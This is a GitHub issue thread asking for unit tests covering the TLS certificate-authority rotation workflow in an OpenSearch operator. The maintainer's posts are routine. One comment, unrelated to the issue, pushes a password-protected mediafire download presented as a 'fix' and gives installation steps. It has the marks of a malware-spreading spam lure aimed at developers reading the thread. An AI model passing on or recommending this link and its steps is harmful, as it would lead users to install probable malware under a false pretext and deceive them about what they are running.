### ISSUE TITLE
[TECH DEBT] Add unit test coverage for CA rotation workflow

### ISSUE THREAD

**Issue by reneradoi** [canonical/opensearch-operator#415]
With https://github.com/canonical/opensearch-operator/pull/353 we added the functionality to rotate the TLS Certificate Authority (CA) and renew the TLS certificates used in Opensearch and our operator. As part of the PR, integration test coverage has been provided. Due to time restrictions, unit test coverage could not be added and is now missing.

To reduce risk when making changes to the workflow, a solid coverage of the feature with unit tests is required. This should be added soon.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by reneradoi** [comment]
Was already addressed in https://github.com/canonical/opensearch-operator/pull/353.
